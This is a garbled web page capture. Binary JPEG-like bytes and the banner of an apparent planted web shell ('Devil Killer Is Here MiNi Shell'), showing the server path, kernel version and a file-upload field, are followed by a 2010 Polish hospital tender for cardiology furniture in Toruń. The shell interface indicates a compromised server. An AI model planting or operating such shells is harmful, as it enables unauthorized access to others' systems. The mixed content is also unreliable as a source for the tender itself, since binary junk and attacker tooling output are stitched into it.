JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/188993-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa mebli medycznych do Przychodni Kardiologicznej i Oddziału Kardiologii.</b><br>
<b>Numer ogłoszenia: 188993 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli medycznych do Przychodni Kardiologicznej i Oddziału Kardiologii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli medycznych do Przychodni Kardiologicznej i Oddziału Kardiologii:
I. Przychodnia Kardiologiczna
1. Gabinet lekarski nr 23
1.1. Szafka przyścienna 2-komorowa z 2-ma drzwiami i półkami, przystosowana do zabudowy narożnika, 120 x 45 x 85 - 1 szt.				
1.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 80 x 35 x 60	 - 1 szt.						
1.3. Szafa stojąca jednodrzwiowa z półkami, zamykana na zamek, 50 x 55 x 200 - 1 szt.						
1.4. Szafa stojąca ubraniowa 2-komorowa, dwudrzwiowa z półkami i drążkami wieszakowymi, zamykana na zamek, 80 x 55 x 200 - 1 szt.		
1.5. Szafa stojąca 2-drzwiowa z półkami i 2-ma szufladami w dolnej części, zamykana na zamki, 80 x 45 x 200 - 1	szt.				
1.6. Szafa lekarska dzielona poziomo, górą przeszklona z półkami, zamykana na zamki, 50 x 45 x 200 - 1 szt.	 					
1.7. Szafa dzielona poziomo, 4-drzwiowa z półką otwartą w środkowej części,  zamykana na zamki	, 80 x 45 x 200 - 1	szt.				
1.8. Komoda z 2-ma szufladami na całej długości, 2 ma szufladami wąskimi i 2-ma drzwiami w dolnej części, 80 x 45 x 115 - 1 szt.				
1.9. Stolik opatrunkowo-zabiegowy z blatem roboczym z tworzywa i 2-ma półkami, 60 x 60 x 89 - 2 szt.						
1.10. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt.					
1.11. Parawan lekarski przejezdny z wypełnieniem z pleksi, 90 x 180 - 1 szt.	
1.12. Podstawa jezdna pod butlę tlenową - 1 szt.			
1.13. Kozetka drewniana, 195 x 70 x 55 - 1 szt.				
1.14. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 2 szt.
1.15. Krzesło dla pacjenta - 2 szt.					
2. Sala ćwiczeń nr 24
2.1. Szafka przyścienna jednodrzwiowa z 2-ma półkami, zamykana na zamek, 55 x 50 x 85 - 1 szt.						
2.2. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 55 x 30 x 60 - 1 szt.						
2.3. Szafa ubraniowa jednodrzwiowa dzielona pionowo na 2-komory z półkami i drążkami wieszakowymi, zamykana na zamek, 60 x 55 x 200 - 3 szt.	
2.4. Szafa lekarska dzielona poziomo, górą przeszklona z półkami, zamykana na zamki, 51 x 55 x 200 - 1 szt.						
2.5 Szafa stojąca dzielona poziomo z 2-ma drzwiami i półkami, zamykana na zamek, 55 x 50 x 200 - 1 szt.						
2.6. Szafa stojąca na dokumentację dzielona poziomo z 2-ma drzwiami zamykanymi na zamek i półką otwartą w środkowej części, 55 x 50 x 200 - 1 szt.	
2.7. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt.						
2.8. Stolik opatrunkowo-zabiegowy z blatem roboczym z tworzywa i 2-ma półkami, 60 x 60 x 89 - 1 szt.						
2.9. Kozetka lekarska, 195 x 55 x 55 - 1 szt.				
2.10. Parawan lekarski przejezdny z wypełnieniem z pleksi, 90 x 180 - 1 szt.	
2.11. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 2 szt.	
2.12. Krzesło dla pacjenta - 2 szt.
2.13. Wieszak stojący - 1 szt.					
3. Sala ćwiczeń nr 25
3.1. Szafka przyścienna jednodrzwiowa z 2-ma półkami, zamykana na zamek, 55 x 50 x 85 - 1 szt.						
3.2. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 55 x 35 x 60 - 1 szt.						
3.3. Szafka przyścienna 3-komorowa z drzwiami i 4-ma szufladami, 130 x 60 x 89 - 1 szt.						
3.4. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 80 x 30 x 60	- 1 szt.						
3.5. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 40 x 30 x 60 - 1 szt.						
3.6. Biurko lekarskie z 4-ma szufladami, z półką pod klawiaturę, 110 x 60 x 78 - 1 szt.						
3.7. Regał naścienny z podziałem pionowym, na dokumenty, 110 x 35 x 42 - 1 szt.
3.8. Stolik opatrunkowo-zabiegowy z blatem roboczym z tworzywa i 2-ma półkami, 60 x 60 x 89 - 1 szt.						
3.9. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 1 szt.	
3.10. Krzesło dla pacjenta - 2 szt.					
4. Sala ćwiczeń nr 26
4.1. Szafka przyścienna jednodrzwiowa z zamkiem, z 2-ma półkami, przystosowana do zabudowy narożnika, 70 x 45 x 85	- 1 szt.				
4.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 70 x 55 x 60	 - 1 szt.						
4.3. Szafa ubraniowa jednodrzwiowa dzielona pionowo na 2-komory z półkami i drążkami wieszakowymi, zamykana na zamek, 45 x 55 x 190 - 3 szt.	
4.4. Szafa stojąca dzielona poziomo z 2-ma drzwiami i półkami, zamykana na zamek, 50 x 55 x 190 - 2 szt.					
4.5. Szafa stojąca na dokumentację dzielona poziomo z 2-ma drzwiami i półką otwartą w środkowej części, 50 x 55 x 190 - 1 szt.			
4.6. Nadstawka szafy jednodrzwiowa z półką, 70 x 55 x 50 - 1 szt.		
4.7. Nadstawka szafy jednodrzwiowa z półką, 45 x 55 x 50 - 1 szt.		
4.8. Nadstawka szafy dwudrzwiowa z półką, 90 x 55 x 50	- 1 szt.	
4.9. Nadstawka szafy jednodrzwiowa z półką, 50 x 55 x 50 - 3 szt.		
4.10. Biurko z wbudowanym kontenerem 4-szufladowym i blatem roboczym opartym na nogach chromowanych, z półką pod klawiaturę, 150 x 60 x 78 - 1 szt.	
4.11. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 1 szt.	
4.12. Krzesło dla pacjenta - 2 szt.					
5. Pok. wypoczynkowy nr 27
5.1. Szafka przyścienna jednodrzwiowa z zamkiem, z 2-ma półkami, przystosowana do zabudowy narożnika, 70 x 45 x 85	- 1 szt.				
5.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 70 x 35 x 60	 - 1 szt.						
5.3. Szafa stojąca jednodrzwiowa z 2-ma półkami i drążkiem wieszakowym, zamykana na zamek, 45 x 55 x 200 - 2 szt.				
5.4. Szafa stojąca dzielona poziomo z drzwiami, haczykami na ubrania, zamykana na zamki, 45 x 55 x 200 - 6 szt.	 				
5.5. Fotel wypoczynkowy z regulacją oparcia - 6 szt.			
5.6. Stolik okolicznościowy z półką dolną, 100 x 50 x 63 - 1 szt.	
5.7. Kozetka lekarska, 195 x 55 x 55 - 1 szt.				
5.8. Krzesło dla pacjenta - 2	szt.					
5.9. Wieszak stojący - 1 szt.					
5.10. Wieszak ścienny do telewizora 40 calowego z regulacją konta ustawienia ekranu - 1 szt.						
6. Gabinet nr 35
6.1. Szafa stojąca 2-komorowa, dzielona poziomo, 4-drzwiowa z półkami (górą i dołem przegroda pionowa) w komorach górnych drążki wieszakowe, w komorach dolnych 2 x półka, zamykana na zamki, 90 x 55 x 180 - 1	szt.		
6.2. Nadstawka szafy 2- komorowa dwudrzwiowa, 90 x 55 x 40 - 1	szt.	
6.3. Biurko - stanowisko do pracy dla 2-osób, (wzmocnione) z 2-ma podstawami pod komputery, 2-ma półkami pod klawiaturę, 2ma uchwytami na klamry aparatów mocowanymi do boku oraz przelotami na przewody, 200 x 80 x 75 - 1 szt.	
6.4. Nadstawka biurka, 200 x 40 x 145	 - 1 szt.				
6.5. Kontener przejezdny z drzwiami i półką, 40 x 50 x 61	- 2 szt.		
6.6. Kontener przejezdny z 2-ma szufladami, 40 x 50 x 61	 - 1 szt.		
6.7. Kozetka lekarska drewniana, 200 x 70 x 55	- 1 szt.			
6.8. Szafka wisząca dwudrzwiowa przeszklona z półką, zamykana na zamek, 70 x 30 x 60 - 1 szt.						
6.9. Stanowisko komputerowe z półką pod klawiaturę i szafką pod komputer + nadstawka otwarta, 100 x 60 x 75  +100 x 25 x 35 - 1 kpl.		
6.10. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 100 x 30 x 60 - 1 szt.						
6.11. Szafa kartotekowa dzielona pionowo z 14-ma szuflami na kartoteki i nadstawką dwudrzwiową na dokumenty, zamykana na zamek, 70 x 55 x 220	- 4 szt.						
6.12. Szafka przyścienna jednodrzwiowa z 2-ma półkami, zamykana na zamek, 55 x 30 x 80 - 1 szt.						
6.13. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 3 szt.	
6.14. Krzesło dla pacjenta z podłokietnikami - 1	szt.			
6.15. Krzesło dla pacjenta - 2 szt.					
6.16. Wieszak ścienny na ubrania, 50 x 120 - 1	szt.			
6.17. Podnóżek 2-stopniowy, 50 x 65 x 42 - 1 szt.			
7. Gabinet lekarski nr 36
7.1. Szafka przyścienna 2-komorowa z drzwiami i półkami, 120 x 45 x 85 - 1 szt.
7.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 80 x 35 x 60	 - 1 szt.						
7.3. Szafa ubraniowa jednodrzwiowa dzielona pionowo na 2-komory z półkami i drążkami wieszakowymi, zamykana na zamek, 60 x 55 x 200 - 1 szt.	
7.4. Biurko lekarskie narożne z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 160/160 x 70/50 x 78 - 1 szt.				
7.5. Kozetka lekarska - 195 x 55 x 55	- 1 szt.				
7.6. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem)	- 1 szt.	
7.7. Krzesło dla pacjenta - 2	 szt.					
7.8. Szafa stojąca dzielona poziomo z drzwiami z zamkiem i półkami, 80 x 45 x 200 - 1 szt.						
7.9. Komoda - szafka z drzwiami i szufladą pod blatem, 80 x 45 x 105 - 1 szt.
7.10. Szafa stojąca na dokumentację dzielona poziomo z 2-ma drzwiami i półką otwartą w środkowej części, zamykana na zamek, 45 x 45 x 200 - 1 szt.	
7.11. Wieszak stojący na ubrania - 1 szt.				
8. Gabinet lekarski nr 34
8.1. Szafka przyścienna 2-komorowa z drzwiami i półkami, 90 x 50 x 85 - 1 szt.
8.2. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 45 x 35 x 60 - 1 szt.						
8.3. Szafa stojąca ubraniowa 2-komorowa, dwudrzwiowa z półkami i drążkami wieszakowymi, zamykana na zamek, 80 x 55 x 200 - 1 szt.		
8.4. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt.	 					
8.5. Szafka wisząca otwarta z półką, 70 x 35 x 60 - 1 szt.		
8.6. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 90 x 35 x 60	 - 1 szt.						
8.7. Komoda - szafka z drzwiami i szufladą w górnej części, 80 x 45 x 105 - 1 szt.
8.8. Szafa stojąca na dokumentację dzielona poziomo z 2-ma drzwiami i półką otwartą w środkowej części, zamykana na zamek, 45 x 45 x 200 - 1 szt.	
8.9. Szafa stojąca na dokumentację dzielona poziomo z 4-ma drzwiami i półką otwartą w środkowej części, zamykana na zamki, 80 x 45 x 200 - 1	 szt.	
8.10. Kozetka lekarska drewniana, 200 x 70 x 55 - 1 szt. 			
8.11. Parawan lekarski przejezdny z wypełnieniem z pleksi, 90 x 180 - 1 szt.	
8.12. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 1 szt. 	
8.13. Krzesło dla pacjenta - 2 szt.					
8.14. Wieszak stojący na ubrania - 1 szt.			
9. /Wnęka/
9.1. Szafka przyścienna jednodrzwiowa z 2-ma półkami, zamykana na zamek,	55 x 50 x 85 - 1 szt.						
9.2. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 55 x 35 x 60 - 1 szt.						
9.3. Szafa stojąca ubraniowa 2-komorowa, dwudrzwiowa z półkami i drążkami wieszakowymi, zamykana na zamek, 80 x 55 x 200 - 1 szt.		
9.4 Kozetka lekarska, 195 x 55 x 55 - 1 szt.				
9.5. Szafa stojąca dzielona poziomo z drzwiami z zamkiem i półkami, 80 x 45 x 200 - 1 szt.						
9.6. Komoda - szafka z drzwiami i szufladą pod blatem, 80 x 45 x 105 - 1 szt.
9.7. Szafa stojąca na dokumentację dzielona poziomo z 2-ma drzwiami z zamkiem i półką otwartą w środkowej części, 45 x 45 x 200 - 1 szt.			
9.8. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt. 					
9.9. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 1 szt. 	
9.10. Krzesło dla pacjenta - 2 szt. 					
9.11. Wieszak stojący na ubrania - 1 szt.	 			
10. Gabinet lekarski nr 33
10.1. Szafka przyścienna 2-komorowa z drzwiami i półkami, 90 x 50 x 85 - 1 szt.
10.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 80 x 35 x 60 - 1 szt.						
10.3. Szafa stojąca ubraniowa 2-komorowa, dwudrzwiowa z półkami i drążkami wieszakowymi, zamykana na zamek, 90 x 55 x 200 - 1 szt.		
10.4. Szafa stojąca dzielona poziomo z drzwiami i półkami, zamykana na zamek, 80 x 45 x 200 - 1 szt. 						
10.5. Komoda - szafka z drzwiami i szufladą pod blatem, 80 x 45 x 105 - 1 szt.
10.6. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt.					
10.7. Kozetka lekarska - 195 x 55 x 55 - 1 szt.				
10.8. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 2 szt. 	
10.9 Krzesło dla pacjenta - 2 szt.					
10.10. Wieszak stojący na ubrania - 1 szt.				
11. Gabinet nr 28
11.1. Szafka przyścienna 3-komorowa z drzwiami i półkami, 158 x 50 x 85 - 1	 szt.
11.2. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 80 x 35 x 60 - 1 szt.						
11.3. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 40 x 35 x 60 - 1 szt.						
11.4. Szafa stojąca ubraniowa 2-komorowa, dwudrzwiowa z półkami i drążkami wieszakowymi, zamykana na zamek, 90 x 55 x 200 - 1 szt. 		
11.5. Biurko lekarskie z 4-ma szufladami, szafką pod komputer i półką pod klawiaturę, 130 x 70 x 78 - 1 szt.					
11.6. Szafka wisząca otwarta z półką, 70 x 35 x 60 - 1 szt.		
11.7. Szafka wisząca dwudrzwiowa z półką, zamykana na zamek, 90 x 35 x 60 - 1 szt.						
11.8. Szafka wisząca dwudrzwiowa z otwartą półką w dolnej części, zamykana na zamek, 100 x 35 x 72 - 1 szt.					
11.9. Szafa stojąca dzielona poziomo z drzwiami z zamkiem i półkami, 80 x 55 x 200 - 1 szt.	 					
11.10. Szafa stojąca dzielona poziomo z 2-ma drzwiami z zamkiem i 2-ma szufladami, 50 x 55 x 200 - 1 szt.					
11.11. Szafa kartotekowa dzielona pionowo z 14-ma szuflami na kartoteki i nadstawką dwudrzwiową na dokumenty, zamykana na zamek, 70 x 55 x 220	- 5 szt.						
11.12. Szafa stojąca dzielona pionowo 2-drzwiowa z półkami, zamykana na zamek, 100 x 40 x 200 - 1	 szt.					
11.13. Kozetka lekarska drewniana do badań echo, 195 x 55 x 70 - 1 szt.	
11.14. Parawan lekarski przejezdny z wypełnieniem z pleksi, 90 x 180 - 1 szt. 11.15. Stolik pod kserokopiarkę, z dwiema półkami - 1 szt. 		
11.16. Podnóżek 2-stopniowy, 50 x 65 x 42 - 1 szt.			
11.17. Krzesło do biurka (obrotowe, na kółkach, z wysokim oparciem) - 1 szt. 11.18. Krzesło dla pacjenta - 2 szt. 					
11.19. Wieszak stojący na ubrania - 1	 szt. 				
12. Korytarz
12.1. Ławeczka na metalowej podstawie z 3-ma siedziskami profilowanymi, pokrytymi dermą, L= 145 - 1	 szt. 					
12.2. Ławeczka na metalowej podstawie z 4-ma siedziskami profilowanymi, pokrytymi dermą, L=197 - 1 szt.	 				
12.3. Ławeczka na metalowej podstawie z 5-ma siedziskami profilowanymi, pokrytymi dermą, L= 249 - 3	 szt.					
12.4. Pojemnik na odpady, otwierany przyciskiem pedałowym, poj. 20 litrów, wykonany ze stali nierdzewnej w kolorze stalowym, wytrzymały i łatwy do utrzymania w czystości - 22	szt.					
12.5. Lustro ścienne (bez ramy), 60 x 40 - 11 szt.			

II. Oddział Kardiologii
1. Szafa lekarska dwudrzwiowa, drzwi i boki przeszklone z zamontowanym oświetleniem wewnętrznym, zamykana na zamek, 90 x 55 x 200 - 1	 szt.	
2. Taboret na nogach chromowanych z siedziskiem tapicerowanym materiałem zmywalnym - 40 szt.	 					
3. Szafa dwudrzwiowa z półkami, zamykana na zamek, 100 x 45 x 190 - 7 szt.
4. Nadstawka szafy, dwudrzwiowa, zamykana na zamek, 100 x 45 x 45 - 7 szt.
5. Szafa dwudrzwiowa z półkami, zamykana na zamek, 95 x 45 x 190 - 1 szt. 
6. Nadstawka szafy, dwudrzwiowa, zamykana na zamek, 95 x 45 x 45 - 1 szt.
7. Szafa jednodrzwiowa z półkami, zamykana na zamek, 60 x 45 x 135 - 1 szt.
8. Wieszak stojący chromowany - 1 szt. 			
9. Lustro ścienne, 60 x 120	- 1 szt.					
10. Szafka - komoda z 5-ma szufladami, 52 x 55 x 110 - 1 szt.	
11. Lustro ścienne (bez ramy), 127 x 60 - 1 szt. 			
12. Lustro ścienne (bez ramy), 120 x 60 - 1 szt.			
13. Kanapa rozkładana z wysokim profilowanym oparciem pod głowę, boki z podłokietnikami drewnianymi, tapicerowana wytrzymałym materiałem - (do wyboru przez Zamawiającego), L=210 - 2 szt.					
14. Fotel wypoczynkowy z wysokim profilowanym oparciem pod głowę, boki z podłokietnikami drewnianymi, tapicerowany wytrzymałym materiałem- (do wyboru przez Zamawiającego) - 2 szt.					
15. Fotel rozkładany do spania - 1 szt.				
16. Szafka 2-komorowa z drzwiami i 4-ma szufladami, 75 x 50 x 85	- 2 szt.	
17. Szafka wisząca dwudrzwiowa z półką, 75 x 35 x 60 - 2 szt.		
18. Szafka 2-komorowa z drzwiami i 4-ma szufladami, 85 x 60 x 85	- 1 szt.	
19. Szafka wisząca dwudrzwiowa z półką, 85 x 35 x 60 - 1 szt.		
20. Szafka dwudrzwiowa z wbudowanym zlewozmywakiem 1-komorowym ze stali kwasoodpornej, wielkość komory 40 x 34 x 25 cm oraz koszem na odpadki montowanym na drzwiach, 85 x 60 x 85 - 1 szt.				
21. Stolik na stelażu metalowym z blatem laminowanym, 100 x 70 x 73 - 1 szt.
22. Krzesło na stelażu metalowym chromowanym z siedziskiem tapicerowanym - 4 szt.						
23. Półka pod mikrofalówkę montowana do ściany na stabilnych wspornikach metalowych z płynną regulacją wysokości, półka z bocznymi burtami, 53 x 36 x 50 - 1 szt.					
24. Stelaż przejezdny na odpady z pokrywą podnoszoną pedałowo, 60l, wykonany ze stali nierdzewnej, 34 x 34 x 70  - 1	szt.				
25. Biurko narożne z wbudowaną szafką z 4-ma szufladami, szafką z drzwiami i półką, szafką otwartą pod komputer, blat biurka prawostronnie ścięty, profilowany, 140 /160 x 70/60 x 78  - 1 szt.					
26. Szafka wisząca otwarta na dokumenty, 80 x 35 x 72	- 2 szt.		
27. Szafa dzielona poziomo 4-drzwiowa z półkami zamykana na zamki, 80 x 55 x 190 - 1 szt.				
28. Szafa stojąca dwudrzwiowa z półkami, zamykana na zamek, 80 x 55 x 190 - 1 szt. 						
29. Nadstawka szafy, dwudrzwiowa, zamykana na zamek, 80 x 55 x 50 - 2 szt.
30. Szafa stojąca ubraniowa, jednodrzwiowa dzielona pionowo na dwie komory z 2-ma półkami i drążkami wieszakowymi, 50 x 55 x 190 - 1 szt.		
31. Nadstawka szafy, jednodrzwiowa, zamykana na zamek, 50 x 55 x 50 - 1 szt.
32. Komoda 2-komorowa 80 2-drzwiowa  z półkami i przedłużonym, zaokrąglonym blatem, 142 x 35 x 78 - 1 szt. 					
33. Szafa dzielona poziomo 4-drzwiowa z półkami z półką otwartą w środkowej części, zamykana na zamki, 80 x 36 x 240 - 1 szt.			
34. Szafa dzielona poziomo 4-drzwiowa z półkami z 2-ma półkami otwartymi w środkowej części, zamykana na zamki,	80 x 36 x 240 - 1 szt.		
35. Komoda dwudrzwiowa z półkami, 70 x 36 x 94 - 1 szt.			
36. Szafka na 50 sztuk kluczy - 1 szt.					
37. Szafa stojąca 2-komorowa z półkami na kartoteki, (odległości między półkami dostosowane do wielkości kopert) zamykana na zamki, 92 x 35 x 219 - 1 szt.	
38. Szafa stojąca 1-komorowa z półkami na kartoteki, (odległości między półkami dostosowane do wielkości kopert) zamykana na zamki, 46 x 35 x 219 - 1 szt.	
39. Wózek wielofunkcyjny z szufladą, 2-ma drzwiami i 2-ma półkami, blat roboczy z tworzywa ABS z burtami z trzech stron, 63 x 58 x 89 - 1 szt. 		
40. Regał metalowy 8-półkowy, malowany proszkowo, półki ze skokową regulacją wysokości, 88 x 55 x 240 - 3 szt.					
41. Regał metalowy 8-półkowy, malowany proszkowo, półki ze skokową regulacją wysokości, 37 x 100 x 240 - 1 szt. 					
42. Regał metalowy 8-półkowy, malowany proszkowo, półki ze skokową regulacją wysokości, 80 x 50 x 240 - 1 szt.					
43. Regał metalowy 8-półkowy, malowany proszkowo, półki ze skokową regulacją wysokości, regał w dolnej części dostosowany do wystającego murku przy podłodze, 80 x 50 x 240 - 1 szt.					
44. Regał metalowy 8-półkowy, malowany proszkowo, półki ze skokową regulacją wysokości, regał w dolnej części dostosowany do wystającego murku przy podłodze, 65 x 50 x 240 - 1 szt.					
45. Regał metalowy z półkami, malowany proszkowo, zamykany drzwiami, (odległości między półkami dostosowane do wielkości kopert i płyt CD), zamykany na zamki, 75 x 45 x 200 - 2 szt.					
46. Regał metalowy z półkami, malowany proszkowo, zamykany drzwiami, (odległości między półkami dostosowane do wielkości kopert i płyt CD), zamykany na zamki, 40 x 45 x 200 - 1 szt.					
47. Szafka przejezdna jednodrzwiowa z półką, 50 x 40 x 78 - 1 szt.		
